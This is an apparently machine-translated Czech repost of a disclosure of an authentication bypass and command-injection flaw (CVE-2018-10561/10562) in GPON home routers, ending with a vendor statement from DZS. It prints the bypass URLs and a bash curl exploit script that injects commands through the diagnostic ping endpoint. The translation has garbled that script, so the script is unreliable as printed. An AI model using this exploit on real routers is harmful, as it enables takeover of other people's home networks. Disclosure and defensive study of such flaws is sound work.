Kritická zranitelnost RCE nalezená ve více než milionu domácích směrovačů GPON


Od zveřejnění této zprávy dvě důležité aktualizace:

  1. Náš výzkumný tým vytvořil opravu, která může pomoci efektivním uživatelům. Zkontrolujte to prosím zde
  2. Společnost DASAN Zhone Solutions nám zaslala svůj komentář ke zprávě. Připojujeme jej „tak, jak je“ na konci této stránky

Přehled:

Provedli jsme komplexní hodnocení na několika domácích směrovačích GPON. Mnoho směrovačů dnes používá GPON internet a našli jsme způsob, jak obejít veškerou autentizaci na zařízeních (CVE-2018-10561). S tímto obejít ověřování, také jsme byli schopni odhalit další chybu zabezpečení příkazem (CVE-2018-10562) a provádět příkazy na zařízení.

Vykořisťování:

Při naší analýze firmwaru GPON jsme zjistili dvě různé kritické zranitelnosti (CVE-2018-10561) & CVE-2018-10562), které by v kombinaci umožnily úplnou kontrolu nad zařízením a tedy sítí. První chyba zabezpečení využívá mechanismus ověření zařízení, které má chybu. Tato chyba umožňuje každému útočníkovi obejít veškerou autentizaci.

Tento nedostatek lze nalézt u serverů HTTP, které při ověřování kontrolují konkrétní cesty. To umožňuje útočníkovi obejít autentizaci v jakémkoli koncovém bodě pomocí jednoduchého triku.

Připojením? Images / k URL může útočník obejít koncový bod.

Toto funguje jak na HTML stránkách, tak na GponForm /

Například vložením

/menu.html?images/
nebo
/ GponForm / diag_FORM? Images /

můžeme zařízení spravovat.

Při prohlížení funkcí zařízení jsme si všimli, že diagnostický koncový bod obsahuje příkazy ping a traceroute. Netrvalo dlouho a zjistilo se, že příkazy mohou být zadávány parametrem hostitele.

Protože směrovač ukládá výsledky ping do / tmp a přenáší jej uživateli, když uživatel provede revizi /diag.html, je poměrně snadné provádět příkazy a načíst jejich výstup s chybou zabezpečení bypassu.

Zahrnujeme následující bash verzi exploit code:
#! / bin / bash

echo „[+] Odesílání příkazu…“
# Příkazy odesíláme se dvěma režimy backtick (`) a středníkem (;), protože různé modely se spouštějí na různých zařízeních
curl -k -d “XWebPageName = diag&diag_action = ping&wan_conlist = 0&dest_host = \ `$ 2 \`; $ 2&ipv = 0 ”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ dev / null
echo „[+] Čekám….“
spát 3
echo „[+] Načítání výstupu….“
curl -k $ 1 / diag.html? images / 2>/ dev / null | grep ‘diag_result =‘ | sed -e 's / \\ n / \ n / g'

Dopad:

GPON je typ pasivní optické sítě, která používá vláknovou optiku a je zvláště populární. Když lidé používají GPON, směrovače jsou poskytovány poskytovateli internetových služeb. Ve videu to vidíte více než milion lidí používá tento typ routeru síťového systému.

Tuto chybu zabezpečení jsme testovali na mnoha náhodných směrovačích GPON a zranitelnost byla nalezena na všech z nich. Protože tolik lidí používá tyto typy směrovačů, tato chyba zabezpečení může vést k kompromitaci celé sítě.

Doporučení:

  1. Zkontrolujte, zda váš router používá síť GPON.
  2. Uvědomte si, že routery GPON mohou být napadeny hackery a zneužity.
  3. Promluvte si se svým ISP a zjistěte, co mohou udělat pro opravu chyby.
  4. Upozorněte své přátele na Facebooku (klikněte zde pro sdílení) a Twitteru (klikněte zde pro tweet).

Aktualizace: Prohlášení od DZS týkající se využití vynechání autentizace

Společnost DASAN Zhone Solutions, Inc. prozkoumala nedávné zprávy o médiích, že některá síťová rozhraní (NID) DZS GPON, běžně známá jako směrovače, by mohla být zranitelná vůči zneužití zneužití autentizace.

Společnost DZS zjistila, že touto chybou zabezpečení jsou ovlivněny řady ZNID-GPON-25xx a určité GP6 ONT H640series, když jsou provozovány na konkrétních vydáních softwaru. Dosud nebyly hlášeny žádné dopady této služby na zranitelnost. Po interním vyšetřování jsme zjistili, že potenciální dopad je rozsahem mnohem omezenější, než jak uvádí vpnMentor. Podle záznamů o prodeji DZS jsme v kombinaci s daty získanými do dnešní doby odhadli, že počet jednotek GPON ONT, které mohou být potenciálně mít dopad na méně než 240 000. Navíc vzhledem k relativní zralosti produktů v jejich životním cyklu se domníváme, že dopad je omezen na ještě méně zařízení.

Historie produktu

DZS ZNID-GPON-25xx a některé ONT řady H640, včetně softwaru, který tuto zranitelnost zavedl, byly vyvinuty dodavatelem OEM a znovu prodány společností DZS. Navrženo a uvedeno na trh před více než 9 lety, většina z těchto produktů nyní prochází dlouhou životností. Protože smlouvy o softwarové podpoře již nejsou pro většinu těchto produktů nabízeny, nemáme přímý náhled na celkový počet jednotek, které se v terénu stále aktivně používají..

Řešení

Společnost DZS informovala všechny zákazníky, kteří tyto modely zakoupili, o této chybě zabezpečení. Pracujeme s každým zákazníkem, abychom jim pomohli posoudit metody řešení problému u jednotek, které mohou být stále nainstalovány v terénu. Bude na uvážení každého zákazníka, jak se rozhodnout, jak řešit stav svého nasazeného vybavení.

Posláním DZS je zajistit, aby všechna jeho řešení splňovala nejvyšší bezpečnostní standardy v oboru. Přijímáme toto a každou příležitost, abychom zkontrolovali a neustále zlepšovali naše bezpečnostní metody a testovací metodiky.

Brayan Jackson
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me